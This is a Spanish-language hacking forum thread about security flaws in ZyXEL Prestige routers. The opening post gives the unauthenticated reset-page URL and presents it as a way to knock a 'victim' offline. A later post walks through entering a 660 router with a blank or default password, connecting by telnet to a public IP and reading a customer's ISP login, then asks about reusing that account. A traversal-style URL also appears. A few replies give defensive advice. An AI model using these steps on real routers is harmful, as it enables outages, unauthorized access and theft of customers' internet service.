Tema destacado: Únete al Grupo Steam elhacker.NET
 Autor
|
Tema: bugs en router ZyXEL Prestige 650 HW (Leído 6,427 veces)
|
kata@
 Desconectado
Mensajes: 10
and limited
|
Un fallo de seguridad por el cual un atacante mal intencionado podría resetear la configuración de cualquier router ZyXEL Prestige 650 HW con administración remota http activada. Para explotar este fallo basta con escribir en el navegador: http://[IpRouter]/rpFWUpload.html Como se puede ver, la página "rpFWUpload.html" no está protegida con contraseña, por lo que haciendo clic en el botón Reset podríamos resetear toda la configuración del router y ponerla en sus valores de fábricas. Con esto le tumbarias internet completa a tu victima dejandolo sin internet por varias horas xD.... Te recomiendo que pongas asi "IpRouters/rpFWUpload.html" Si no tiene contraseña el Routers se lo tumbas al toque... salu2!!  Nota del Moderador:
NO SE PONEN IPS PÚBLICAS
Advisory del 24 del 11 del 2004: http://secunia.com/advisories/13278/
|
|
|
|
« Última modificación: 17 Mayo 2007, 04:15 por ANELKAOS »
|
En línea
|
by kat@bulsha
|
|
|
Freestyle10
Desconectado
Mensajes: 56
|
Sabes con que versiones del firmware del modelo que nombras funciona?
Un saludo
|
|
|
|
|
En línea
|
|
|
|
|
|
n3cr0x
Desconectado
Mensajes: 78
|
oigan habra algun undecode en estos tipos de fallos
router ZyXEL Prestige 650 HW algo como esto
http://***.***.***.***/script/...%5c%5c%0c%3c+dir
bueno algo como eso lo cierto que la pregunta es que si hay o no un bug de ese tipo
|
|
|
|
« Última modificación: 17 Mayo 2007, 04:13 por ANELKAOS »
|
En línea
|
-=········[ n3cr0x ]···········=-
|
|
|
BenRu
The Prodigy
Desconectado
Mensajes: 4.004
|
Debes tener user y pass no? He probado con un 660 y no rula  |
|
|
|
|
En línea
|
|
|
|
n3cr0x
Desconectado
Mensajes: 78
|
pues el user y el pass solo te pide en el ftp
este es lo que sucede con un Prestige 660-t1
http:\\***.***.***.***
------------------------------------------------------------------
Prestige 660R-T1
Enter Password and click Login.
Password: ******
-------------------------------------------------------------------
solo doy enter y se logea para cambiar el pass
-------------------------------------------------------------------
Use this screen to change the password.
We recommend that you personalize the system administrator password by changing it to something besides the default '1234'.
The administrator password should must be between 1 - 30 characters.
New Password: ******
Retype to Confirm: ******
---------------------------------------------------------------------
aqui es donde cambio el pass y vuelvo a logear y listo estoy dentro de la configuracion del router
hora para ver la cuenta del cliente tenemos que verificar y el servicio de telnet esta abierto
entramos en ADVANCED SETUP
luego en REMOTE MANAGEMENT
Y vemos lo que hay activo
------------------------------------------------------------------------
Remote Management Control
------------------------------------------------------------------------Server Type Access Status Port Secured Client IP
Telnet All 23 0.0.0.0
FTP All 21 0.0.0.0
Web All 80 0.0.0.0
y luego entramos por telnet
seleccionar 4 para ver perfil del router[/b]
> telnet 200.121.252.2
password : ******
Copyright (c) 1994 - 2006 ZyXEL Communications Corp.
Prestige 660HW-T1 Main Menu
Getting Started Advanced Management
1. General Setup 21. Filter and Firewall Setup
2. WAN Backup Setup 22. SNMP Configuration
3. LAN Setup 23. System Security
4. Internet Access Setup 24. System Maintenance
25. IP Routing Policy Setup
Advanced Applications 26. Schedule Setup
11. Remote Node Setup
12. Static Routing Setup
14. Dial-in User Setup 99. Exit
15. NAT Setup
Enter Menu Selection Number: 4
-----------------------------------------------------------------------
Menu 4 - Internet Access Setup
ISP's Name= MyISP
Encapsulation= PPPoE
Multiplexing= LLC-based
VPI #= 8
VCI #= 60
ATM QoS Type= UBR
Peak Cell Rate (PCR)= 0
Sustain Cell Rate (SCR)= 0
Maximum Burst Size (MBS)= 0
My Login= 4411224@speedy
My Password= ********
Idle Timeout (sec)= 3600
IP Address Assignment= Dynamic
IP Address= N/A
Network Address Translation= SUA Only
Address Mapping Set= N/A
Press ENTER to Confirm or ESC to Cancel:
|
|
|
|
« Última modificación: 17 Mayo 2007, 04:13 por ANELKAOS »
|
En línea
|
-=········[ n3cr0x ]···········=-
|
|
|
TigreDARK
Desconectado
Mensajes: 369
|
oigan habra algun undecode en estos tipos de fallos
router ZyXEL Prestige 650 HW algo como esto
http://***.***.***.***/script/...%5c%5c%0c%3c+dir
bueno algo como eso lo cierto que la pregunta es que si hay o no un bug de ese tipo
Hola, este script no funciona, hablamos de un ROUTER, no de WINDOWS. El router no tiene C, no existe el comando DIR en los router Zyxel, tiene su proprio sistema operativo PROPRIETARIO. Ese bug ya esta parcheado! Hay algunos router que todavia lo tendran, pero NO GANAS NADA. Ya que le sacarias la configuracion de INTERNET, y de la red local! Asi que lo unico que logras es sacarle Intenet y no poder utilizarlo mas, hasta que lo vuelve a reconfigurar el o su proveedor de Internet. Al momento no hay muchos bug de Zyxel... ya los han reparado casi todos! Luego tambien depende del modelo, hay modelos que son vulnerables y otros no! Bye 
|
|
|
|
« Última modificación: 17 Mayo 2007, 04:12 por ANELKAOS »
|
En línea
|
|
|
|
n3cr0x
Desconectado
Mensajes: 78
|
oigan habra algun undecode en estos tipos de fallos
router ZyXEL Prestige 650 HW algo como esto
http://***.***.***.***/script/...%5c%5c%0c%3c+dir
bueno algo como eso lo cierto que la pregunta es que si hay o no un bug de ese tipo
Hola, este script no funciona, hablamos de un ROUTER, no de WINDOWS. El router no tiene C, no existe el comando DIR en los router Zyxel, tiene su proprio sistema operativo PROPRIETARIO. Ese bug ya esta parcheado! Hay algunos router que todavia lo tendran, pero NO GANAS NADA. Ya que le sacarias la configuracion de INTERNET, y de la red local! Asi que lo unico que logras es sacarle Intenet y no poder utilizarlo mas, hasta que lo vuelve a reconfigurar el o su proveedor de Internet. Al momento no hay muchos bug de Zyxel... ya los han reparado casi todos! Luego tambien depende del modelo, hay modelos que son vulnerables y otros no! Bye Ha claro tienes razon sobre el script solo era una referencia a ese tipo de fallas en el caso de que alguien en cuentre en dicho router el nombre de usuario y password metiendose por telnet para conectarse a internet ejemplo Prestige 660HW-T1 My Login= 4411224@speedy My Password= ******** se puede conectar desde otra pc a internet con ese login? logicamente el password vendria ha ser el mismo que el MY LOGIN ya que el cliente que esta conectado con eso no cambia para nada el login por que ignora el peligro de falcificacion de usuario
|
|
|
|
« Última modificación: 17 Mayo 2007, 04:12 por ANELKAOS »
|
En línea
|
-=········[ n3cr0x ]···········=-
|
|
|
Freestyle10
Desconectado
Mensajes: 56
|
Creo que se están liando demasiado, Vamos a ver supuestamente a este router se puede acceder remotamente de tres maneras por http, por telnet o por ftp.
Bien estos accesos se pueden denegar configurando el router, la vulnerabilidad antes comentada afecta solo a aquellos router que tengan el acceso por http activado.
n3cr0x lógicamente puedes conectar con otro router con la cuenta que dices siempre y cuando estés abonado al mismo proveedor de servicios, no creo que la password se lo mismo que el my login ya que de ser así sería un grabe fallo por parte del isp.
|
|
|
|
|
En línea
|
|
|
|
n3cr0x
Desconectado
Mensajes: 78
|
Creo que se están liando demasiado, Vamos a ver supuestamente a este router se puede acceder remotamente de tres maneras por http, por telnet o por ftp.
Bien estos accesos se pueden denegar configurando el router, la vulnerabilidad antes comentada afecta solo a aquellos router que tengan el acceso por http activado.
n3cr0x lógicamente puedes conectar con otro router con la cuenta que dices siempre y cuando estés abonado al mismo proveedor de servicios, no creo que la password se lo mismo que el my login ya que de ser así sería un grabe fallo por parte del isp.
ya lo probe pero al parecer tengo que tener linea  yo probe quitando el cable de mi telefono en casa solo que este tiene que tallamar con tarjeta de prepago mi no funciono
|
|
|
|
|
En línea
|
-=········[ n3cr0x ]···········=-
|
|
|
oRTNZ
Desconectado
Mensajes: 808
no no soy malo... soy vicioso :p
|
Hola, he testiado en un Prestige 650 HW-31 y rula alguna forma de protegerse? saludos
|
|
|
|
|
En línea
|
(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
|
|
|
Freestyle10
Desconectado
Mensajes: 56
|
Quitar la administración por web y ponerla por telnet te puede solucionar el problema
|
|
|
|
|
En línea
|
|
|
|
oRTNZ
Desconectado
Mensajes: 808
no no soy malo... soy vicioso :p
|
OK gracias por tu respuesta,saludos
|
|
|
|
|
En línea
|
(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
|
|
|
Freestyle10
Desconectado
Mensajes: 56
|
De nada, estamos aquí para ayudar, podrías aportar más datos sobre que modelo y que firmware tiene el router que comentas.
|
|
|
|
|
En línea
|
|
|
|
|
 |
